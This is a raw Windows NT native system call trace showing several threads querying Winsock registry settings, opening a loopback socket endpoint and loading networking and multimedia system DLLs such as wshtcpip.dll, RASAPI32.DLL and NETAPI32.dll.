 03768   676   NtQueryValueKey  ... TitleIdx=0, Type=3, Data= ... TitleIdx=0, Type=3, Data="\13\0\0\0\3\0\0\0\2\0\0\0\1\0\0\0\6\0\0\0\2\0\0\0\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\6\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\0\0\0\0\1\0\0\0\6\0\0\0\2\0\0\0\2\0\0\0\21\0\0\0\2\0\0\0\2\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\21\0\0\0\0\0\0\0\0\0\0\0\21\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\2\0\0\0\3\0\0\0\0\0\0\0"}, 152, ) }, 152, ) == 0x0
 03774   676   NtClose  (500, ... ) == 0x0
 03775   676   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "System\CurrentControlSet\Services\Tcpip\Parameters\Winsock"}, ... 500, ) }, ... 500, ) == 0x0
 03776   676   NtQueryValueKey  (500,  (500, "MinSockaddrLength", Partial, 144, ... TitleIdx=0, Type=4, Data="\20\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (500, "MinSockaddrLength", Partial, 144, ... TitleIdx=0, Type=4, Data="\20\0\0\0"}, 16, ) }, 16, ) == 0x0
 03777   676   NtQueryValueKey  (500,  (500, "MaxSockaddrLength", Partial, 144, ... TitleIdx=0, Type=4, Data="\20\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (500, "MaxSockaddrLength", Partial, 144, ... TitleIdx=0, Type=4, Data="\20\0\0\0"}, 16, ) }, 16, ) == 0x0
 03778   676   NtQueryValueKey  (500,  (500, "UseDelayedAcceptance", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (500, "UseDelayedAcceptance", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 03779   676   NtQueryValueKey  (500,  (500, "HelperDllName", Partial, 144, ... , Partial, 144, ...
 03780   456   NtReleaseMutant  (404, ... 0x0, ) == 0x0
 03781   456   NtWaitForSingleObject  (404, 0, 0x0, ... ) == 0x0
 03782   456   NtQueryInformationFile  (400, 1235616, 24, Standard, ... {status=0x0, info=24}, ) == 0x0
 03783   456   NtReleaseMutant  (404, ... 0x0, ) == 0x0
 03784   456   NtClose  (-1, ... ) == STATUS_INVALID_HANDLE
 03785   456   NtWaitForSingleObject  (404, 0, 0x0, ...
 03779   676   NtQueryValueKey  ... TitleIdx=0, Type=2, Data= ... TitleIdx=0, Type=2, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0w\0s\0h\0t\0c\0p\0i\0p\0.\0d\0l\0l\0\0\0"}, 82, ) }, 82, ) == 0x0
 03786   676   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\wshtcpip.dll"}, 22606104, ... ) }, 22606104, ... ) == 0x0
 03787   676   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\wshtcpip.dll"}, 5, 96, ... 508, {status=0x0, info=1}, ) }, 5, 96, ... 508, {status=0x0, info=1}, ) == 0x0
 03788   676   NtCreateSection  (0xe, 0x0, 0x0, 16, 134217728, 508, ... 512, ) == 0x0
 03789   676   NtClose  (508, ... ) == 0x0
 03790   676   NtMapViewOfSection  (512, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 16, ... (0x1590000), 0x0, 20480, ) == 0x0
 03791   676   NtClose  (512, ...
 03785   456   NtWaitForSingleObject  ... ) == 0x0
 03792   456   NtQueryInformationFile  (400, 1235736, 24, Standard, ... {status=0x0, info=24}, ) == 0x0
 03793   456   NtReleaseMutant  (404, ... 0x0, ) == 0x0
 03794   456   NtCreateEvent  (0x1f0003, 0x0, 1, 0, ... 508, ) == 0x0
 03795   456   NtWaitForSingleObject  (492, 0, 0x0, ...
 03791   676   NtClose  ... ) == 0x0
 03796   676   NtUnmapViewOfSection  (-1, 0x1590000, ... ) == 0x0
 03797   676   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\wshtcpip.dll"}, 22606420, ... ) }, 22606420, ... ) == 0x0
 03798   676   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\wshtcpip.dll"}, 5, 96, ... 512, {status=0x0, info=1}, ) }, 5, 96, ... 512, {status=0x0, info=1}, ) == 0x0
 03799   676   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 512, ... 516, ) == 0x0
 03800   676   NtQuerySection  (516, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 03801   676   NtClose  (512, ... ) == 0x0
 03802   676   NtMapViewOfSection  (516, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x71a90000), 0x0, 32768, ) == 0x0
 03803   676   NtClose  (516, ... ) == 0x0
 03804   676   NtSetEventBoostPriority  (492, ...
 03795   456   NtWaitForSingleObject  ... ) == 0x0
 03805   456   NtCreateTimer  (0x1f0003, 0x0, 0, ... 516, ) == 0x0
 03806   456   NtCreateEvent  (0x1f0003, 0x0, 1, 0, ... 512, ) == 0x0
 03807   456   NtSetInformationObject  (512, Handle, {Inherit=0,ProtectFromClose=1,}, 256, ... ) == 0x0
 03808   456   NtAllocateVirtualMemory  (-1, 0, 0, 1048576, 8192, 4, ... 22609920, 1048576, ) == 0x0
 03804   676   NtSetEventBoostPriority  ... ) == 0x0
 03809   676   NtClose  (500, ... ) == 0x0
 03810   676   NtCreateFile  (0xc0100000, {24, 0, 0x42, 0, 0,  (0xc0100000, {24, 0, 0x42, 0, 0, "\Device\Afd\Endpoint"}, 0x0, 0, 3, 3, 0, 22608620, 67, ... 500, {status=0x0, info=0}, ) }, 0x0, 0, 3, 3, 0, 22608620, 67, ... 500, {status=0x0, info=0}, ) == 0x0
 03811   676   NtDeviceIoControlFile  (500, 496, 0x0, 0x0, 0x1207b,  (500, 496, 0x0, 0x0, 0x1207b, "\7\0\0\0\340\0\0\0\350.\27\0\17\346\367w", 16, 16, ... {status=0x0, info=16}, "\7\0\0\0B\0\0\0\0 \0\0(\360\4\201", ) , 16, 16, ... {status=0x0, info=16},  (500, 496, 0x0, 0x0, 0x1207b, "\7\0\0\0\340\0\0\0\350.\27\0\17\346\367w", 16, 16, ... {status=0x0, info=16}, "\7\0\0\0B\0\0\0\0 \0\0(\360\4\201", ) , ) == 0x0
 03812   676   NtDeviceIoControlFile  (500, 496, 0x0, 0x0, 0x1207b,  (500, 496, 0x0, 0x0, 0x1207b, "\6\0\0\0B\0\0\0\0 \0\0(\360\4\201", 16, 16, ... {status=0x0, info=16}, "\6\0\0\0B\0\0\0\0 \0\0(\360\4\201", ) , 16, 16, ... {status=0x0, info=16},  (500, 496, 0x0, 0x0, 0x1207b, "\6\0\0\0B\0\0\0\0 \0\0(\360\4\201", 16, 16, ... {status=0x0, info=16}, "\6\0\0\0B\0\0\0\0 \0\0(\360\4\201", ) , ) == 0x0
 03813   676   NtDeviceIoControlFile  (500, 496, 0x0, 0x0, 0x12047,  (500, 496, 0x0, 0x0, 0x12047, "\0\0\0\0\2\0\0\0\2\0\0\0\21\0\0\0\20\0\0\0\20\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0 \0\0\0\0\0\0\1\0\0\0\352\3\0\0\11\6\2\0\10\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0h\0\0\0\350.\27\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\2\0\0\0\21\0\0\0\0 \0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\0\0\1\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 248, 16, ... {status=0x0, info=0}, "", ) , 248, 16, ... {status=0x0, info=0}, "", ) == 0x0
 03814   676   NtWaitForSingleObject  (464, 0, {0, 0}, ...
 03815   456   NtAllocateVirtualMemory  (-1, 23650304, 0, 8192, 4096, 4, ... 23650304, 8192, ) == 0x0
 03816   456   NtProtectVirtualMemory  (-1, (0x168e000), 4096, 260, ... (0x168e000), 4096, 4, ) == 0x0
 03817   456   NtCreateThread  (0x1f03ff, 0x0, -1, 1235180, 1235896, 1, ... 520, {452, 784}, ) == 0x0
 03818   456   NtQueryInformationThread  (520, Basic, 28, ... {ExitStatus=0x103,TebBaseAddress=0x7ffda000,Pid=452,Tid=784,}, 0x0, ) == 0x0
 03819   456   NtRequestWaitReplyPort  (24, {28, 56, new_msg, 0, 1, 0, 0, 29884557}  (24, {28, 56, new_msg, 0, 1, 0, 0, 29884557} "\0\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\10\2\0\0\304\1\0\0\20\3\0\0" ... {28, 56, reply, 0, 452, 456, 1573, 0} "\0\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\10\2\0\0\304\1\0\0\20\3\0\0" )  ... {28, 56, reply, 0, 452, 456, 1573, 0}  (24, {28, 56, new_msg, 0, 1, 0, 0, 29884557} "\0\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\10\2\0\0\304\1\0\0\20\3\0\0" ... {28, 56, reply, 0, 452, 456, 1573, 0} "\0\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\10\2\0\0\304\1\0\0\20\3\0\0" )  ) == 0x0
 03820   456   NtResumeThread  (520, ...
 03814   676   NtWaitForSingleObject  ... ) == 0x102
 03821   676   NtDeviceIoControlFile  (500, 496, 0x0, 0x0, 0x12003,  (500, 496, 0x0, 0x0, 0x12003, "\2\0\0\0\1\0\0\0\16\0\2\0\0\0\177\0\0\1\0\0\0\0\0\0\0\0", 26, 26, ... {status=0x0, info=524}, "\1\0\0\0\1\0\0\0\16\0\2\0\4\13\177\0\0\1\0\0\0\0\0\0\0\0", ) , 26, 26, ... {status=0x0, info=524},  (500, 496, 0x0, 0x0, 0x12003, "\2\0\0\0\1\0\0\0\16\0\2\0\0\0\177\0\0\1\0\0\0\0\0\0\0\0", 26, 26, ... {status=0x0, info=524}, "\1\0\0\0\1\0\0\0\16\0\2\0\4\13\177\0\0\1\0\0\0\0\0\0\0\0", ) , ) == 0x0
 03822   676   NtDeviceIoControlFile  (500, 496, 0x0, 0x0, 0x12037,  (500, 496, 0x0, 0x0, 0x12037, "\2\0\0\0", 4, 8, ... {status=0x0, info=8}, "\0\0\0\0\0\0\0\0", ) , 4, 8, ... {status=0x0, info=8},  (500, 496, 0x0, 0x0, 0x12037, "\2\0\0\0", 4, 8, ... {status=0x0, info=8}, "\0\0\0\0\0\0\0\0", ) , ) == 0x0
 03823   676   NtDeviceIoControlFile  (500, 496, 0x0, 0x0, 0x12047,  (500, 496, 0x0, 0x0, 0x12047, "\1\0\0\0\2\0\0\0\2\0\0\0\21\0\0\0\20\0\0\0\20\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0 \0\0\0\0\0\0\1\0\0\0\352\3\0\0\11\6\2\0\10\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0h\0\0\0(\0*\0\2\0\4\13\177\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\2\0\0\0\21\0\0\0\0 \0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\0\0\1\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 248, 0, ... {status=0x0, info=0}, 0x0, ) , 248, 0, ... {status=0x0, info=0}, 0x0, ) == 0x0
 03824   676   NtDeviceIoControlFile  (500, 496, 0x0, 0x0, 0x1202f, 0x0, 0, 26, ... {status=0x0, info=26},  (500, 496, 0x0, 0x0, 0x1202f, 0x0, 0, 26, ... {status=0x0, info=26}, "\1\0\0\0\1\0\0\0\16\0\2\0\4\13\177\0\0\1\0\0\0\0\0\0\0\0", ) , ) == 0x0
 03825   676   NtDeviceIoControlFile  (500, 496, 0x0, 0x0, 0x12007,  (500, 496, 0x0, 0x0, 0x12007, "\0\0\0\0\0\0\0\0\0\0\0\0\1\0\0\0\16\0\2\0\4\13\177\0\0\1\0\0\0\0\0\0\0\0", 34, 0, ... {status=0x0, info=0}, 0x0, ) , 34, 0, ... {status=0x0, info=0}, 0x0, ) == 0x103
 03820   456   NtResumeThread  ... 0x0, ) == 0x0
 03826   456   NtWaitForSingleObject  (512, 0, 0x0, ...
 03827   676   NtWaitForSingleObject  (496, 1, {-5000000, -1}, ... ) == 0x0
 03828   676   NtDeviceIoControlFile  (500, 496, 0x0, 0x0, 0x12037,  (500, 496, 0x0, 0x0, 0x12037, "\2\0\0\0", 4, 8, ... {status=0x0, info=8}, "\0\0\0\0\0\0\0\0", ) , 4, 8, ... {status=0x0, info=8},  (500, 496, 0x0, 0x0, 0x12037, "\2\0\0\0", 4, 8, ... {status=0x0, info=8}, "\0\0\0\0\0\0\0\0", ) , ) == 0x0
 03829   676   NtDeviceIoControlFile  (500, 496, 0x0, 0x0, 0x12047,  (500, 496, 0x0, 0x0, 0x12047, "\3\0\0\0\2\0\0\0\2\0\0\0\21\0\0\0\20\0\0\0\20\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0\0 \0\0\0\0\0\0\1\0\0\0\352\3\0\0\11\6\2\0\10\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0h\0\0\0\10\0\20\0\2\0\4\13\177\0\0\1\0\0\0\0\0\0\0\0\2\0\4\13\177\0\0\1\0\0\0\0\0\0\0\0\2\0\0\0\2\0\0\0\21\0\0\0\0 \0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\0\0\1\0\0\0\0\0\0 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 248, 0, ... , 248, 0, ...
 03830   784   NtTestAlert  (... ) == 0x0
 03831   784   NtContinue  (23657776, 1, ...
 03832   784   NtRegisterThreadTerminatePort  (24, ... ) == 0x0
 03833   784   NtCancelTimer  (516, 0, ... ) == 0x0
 03834   784   NtSetTimer  (516, {0, -2147483648}, 0x77f5c6d3, 0x0, 0, 0, 0, ... ) == 0x0
 03835   784   NtSetEvent  (512, ...
 03826   456   NtWaitForSingleObject  ... ) == 0x0
 03836   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 03837   456   NtCreateIoCompletion  (0x1f0003, 0x0, 1, ... 528, ) == 0x0
 03838   456   NtAllocateVirtualMemory  (-1, 0, 0, 1048576, 8192, 4, ... 23658496, 1048576, ) == 0x0
 03839   456   NtAllocateVirtualMemory  (-1, 24698880, 0, 8192, 4096, 4, ... 24698880, 8192, ) == 0x0
 03835   784   NtSetEvent  ... 0x0, ) == 0x0
 03829   676   NtDeviceIoControlFile  ... {status=0x0, info=0}, 0x0, ) == 0x0
 03840   456   NtProtectVirtualMemory  (-1, (0x178e000), 4096, 260, ...
 03841   676   NtDeviceIoControlFile  (500, 496, 0x0, 0x0, 0x12024,  (500, 496, 0x0, 0x0, 0x12024, "\200\17\5\375\377\377\377\377\1\0\0\0\0\27\245q\364\1\0\0\31\0\0\0(\271\245q", 28, 28, ... , 28, 28, ...
 03840   456   NtProtectVirtualMemory  ... (0x178e000), 4096, 4, ) == 0x0
 03841   676   NtDeviceIoControlFile  ... {status=0x0, info=1906644165},  ... {status=0x0, info=1906644165}, "\200\17\5\375\377\377\377\377\1\0\0\0\0\27\245q\364\1\0\0\31\0\0\0(\271\245q", ) , ) == 0x103
 03842   456   NtCreateThread  (0x1f03ff, 0x0, -1, 1235260, 1235976, 1, ...
 03843   676   NtWaitForSingleObject  (496, 1, {-5000000, -1}, ...
 03842   456   NtCreateThread  ... 532, {452, 712}, ) == 0x0
 03844   456   NtQueryInformationThread  (532, Basic, 28, ... {ExitStatus=0x103,TebBaseAddress=0x7ffd9000,Pid=452,Tid=712,}, 0x0, ) == 0x0
 03845   456   NtRequestWaitReplyPort  (24, {28, 56, new_msg, 0, 1, 0, 1235136, 1235068}  (24, {28, 56, new_msg, 0, 1, 0, 1235136, 1235068} "\0\0\0\0\1\0\1\0\0\0\0\0\300\330\22\0\24\2\0\0\304\1\0\0\310\2\0\0" ... {28, 56, reply, 0, 452, 456, 1574, 0} "\0\0\0\0\1\0\1\0\0\0\0\0\300\330\22\0\24\2\0\0\304\1\0\0\310\2\0\0" )  ... {28, 56, reply, 0, 452, 456, 1574, 0}  (24, {28, 56, new_msg, 0, 1, 0, 1235136, 1235068} "\0\0\0\0\1\0\1\0\0\0\0\0\300\330\22\0\24\2\0\0\304\1\0\0\310\2\0\0" ... {28, 56, reply, 0, 452, 456, 1574, 0} "\0\0\0\0\1\0\1\0\0\0\0\0\300\330\22\0\24\2\0\0\304\1\0\0\310\2\0\0" )  ) == 0x0
 03846   456   NtResumeThread  (532, ... 0x0, ) == 0x0
 03847   456   NtClose  (532, ...
 03848   784   NtDelayExecution  (1, {0, -2147483648}, ...
 03849   712   NtTestAlert  (... ) == 0x0
 03850   712   NtContinue  (24706352, 1, ...
 03851   712   NtRegisterThreadTerminatePort  (24, ... ) == 0x0
 03852   712   NtRemoveIoCompletion  (528, {-400000000, -1}, ...
 03847   456   NtClose  ... ) == 0x0
 03853   456   NtSetIoCompletion  (528, 2012594853, 1522320, 0, 1521168, ... ) == 0x0
 03854   456   NtUserCallOneParam  (8, 38, ... ) == 0x20
 03855   456   NtWaitForMultipleObjects  (1, (32, ), 1, 0, {-50000000, -1}, ...
 03852   712   NtRemoveIoCompletion  ... 2012594853, 1522320, {status=0x0, info=1521168}, ) == 0x0
 03856   712   NtWaitForSingleObject  (448, 0, 0x0, ... ) == 0x0
 03857   712   NtWaitForSingleObject  (452, 0, 0x0, ... ) == 0x0
 03858   712   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "RASAPI32.DLL"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03859   712   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\RASAPI32.DLL"}, 24704620, ... ) }, 24704620, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03860   712   NtQueryAttributesFile  ({24, 112, 0x40, 0, 0,  ({24, 112, 0x40, 0, 0, "RASAPI32.DLL"}, 24704620, ... ) }, 24704620, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03861   712   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\RASAPI32.DLL"}, 24704620, ... ) }, 24704620, ... ) == 0x0
 03862   712   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\RASAPI32.DLL"}, 5, 96, ... 532, {status=0x0, info=1}, ) }, 5, 96, ... 532, {status=0x0, info=1}, ) == 0x0
 03863   712   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 532, ... 536, ) == 0x0
 03864   712   NtQuerySection  (536, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 03865   712   NtClose  (532, ... ) == 0x0
 03866   712   NtMapViewOfSection  (536, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x76ee0000), 0x0, 225280, ) == 0x0
 03867   712   NtClose  (536, ... ) == 0x0
 03868   712   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "rasman.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03869   712   NtAllocateVirtualMemory  (-1, 24694784, 0, 4096, 4096, 260, ... 24694784, 4096, ) == 0x0
 03870   712   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\rasman.dll"}, 24703816, ... ) }, 24703816, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03871   712   NtQueryAttributesFile  ({24, 112, 0x40, 0, 0,  ({24, 112, 0x40, 0, 0, "rasman.dll"}, 24703816, ... ) }, 24703816, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03872   712   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\rasman.dll"}, 24703816, ... ) }, 24703816, ... ) == 0x0
 03873   712   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\rasman.dll"}, 5, 96, ... 536, {status=0x0, info=1}, ) }, 5, 96, ... 536, {status=0x0, info=1}, ) == 0x0
 03874   712   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 536, ... 532, ) == 0x0
 03875   712   NtQuerySection  (532, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 03876   712   NtClose  (536, ... ) == 0x0
 03877   712   NtMapViewOfSection  (532, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x76e90000), 0x0, 69632, ) == 0x0
 03878   712   NtClose  (532, ... ) == 0x0
 03879   712   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "NETAPI32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03880   712   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\NETAPI32.dll"}, 24703012, ... ) }, 24703012, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03881   712   NtQueryAttributesFile  ({24, 112, 0x40, 0, 0,  ({24, 112, 0x40, 0, 0, "NETAPI32.dll"}, 24703012, ... ) }, 24703012, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03882   712   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\NETAPI32.dll"}, 24703012, ... ) }, 24703012, ... ) == 0x0
 03883   712   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\NETAPI32.dll"}, 5, 96, ... 532, {status=0x0, info=1}, ) }, 5, 96, ... 532, {status=0x0, info=1}, ) == 0x0
 03884   712   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 532, ... 536, ) == 0x0
 03885   712   NtQuerySection  (536, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 03886   712   NtClose  (532, ... ) == 0x0
 03887   712   NtMapViewOfSection  (536, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x71c20000), 0x0, 323584, ) == 0x0
 03888   712   NtClose  (536, ... ) == 0x0
 03889   712   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "TAPI32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03890   712   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\TAPI32.dll"}, 24703816, ... ) }, 24703816, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03891   712   NtQueryAttributesFile  ({24, 112, 0x40, 0, 0,  ({24, 112, 0x40, 0, 0, "TAPI32.dll"}, 24703816, ... ) }, 24703816, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03892   712   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\TAPI32.dll"}, 24703816, ... ) }, 24703816, ... ) == 0x0
 03893   712   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\TAPI32.dll"}, 5, 96, ... 536, {status=0x0, info=1}, ) }, 5, 96, ... 536, {status=0x0, info=1}, ) == 0x0
 03894   712   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 536, ... 532, ) == 0x0
 03895   712   NtQuerySection  (532, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 03896   712   NtClose  (536, ... ) == 0x0
 03897   712   NtMapViewOfSection  (532, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x76eb0000), 0x0, 172032, ) == 0x0
 03898   712   NtClose  (532, ... ) == 0x0
 03899   712   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "rtutils.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03900   712   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\rtutils.dll"}, 24703012, ... ) }, 24703012, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03901   712   NtQueryAttributesFile  ({24, 112, 0x40, 0, 0,  ({24, 112, 0x40, 0, 0, "rtutils.dll"}, 24703012, ... ) }, 24703012, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03902   712   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\rtutils.dll"}, 24703012, ... ) }, 24703012, ... ) == 0x0
 03903   712   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\rtutils.dll"}, 5, 96, ... 532, {status=0x0, info=1}, ) }, 5, 96, ... 532, {status=0x0, info=1}, ) == 0x0
 03904   712   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 532, ... 536, ) == 0x0
 03905   712   NtQuerySection  (536, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 03906   712   NtClose  (532, ... ) == 0x0
 03907   712   NtMapViewOfSection  (536, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x76e80000), 0x0, 53248, ) == 0x0
 03908   712   NtClose  (536, ... ) == 0x0
 03909   712   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "WINMM.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03910   712   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\WINMM.dll"}, 24703012, ... ) }, 24703012, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03911   712   NtQueryAttributesFile  ({24, 112, 0x40, 0, 0,  ({24, 112, 0x40, 0, 0, "WINMM.dll"}, 24703012, ... ) }, 24703012, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03912   712   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\WINMM.dll"}, 24703012, ... ) }, 24703012, ... ) == 0x0
 03913   712   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\WINMM.dll"}, 5, 96, ... 536, {status=0x0, info=1}, ) }, 5, 96, ... 536, {status=0x0, info=1}, ) == 0x0
 03914   712   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 536, ... 532, ) == 0x0
 03915   712   NtQuerySection  (532, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 03916   712   NtClose  (536, ... ) == 0x0
 03917   712   NtMapViewOfSection  (532, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x76b40000), 0x0, 180224, ) == 0x0
 03918   712   NtClose  (532, ... ) == 0x0
 03919   712   NtCreateEvent  (0x1f0003, 0x0, 0, 0, ... 532, ) == 0x0
 03920   712   NtCreateSemaphore  (0x100003, 0x0, 0, 2147483647, ... 536, ) == 0x0
 03921   712   NtCreateSemaphore  (0x100003, 0x0, 0, 2147483647, ... 540, ) == 0x0
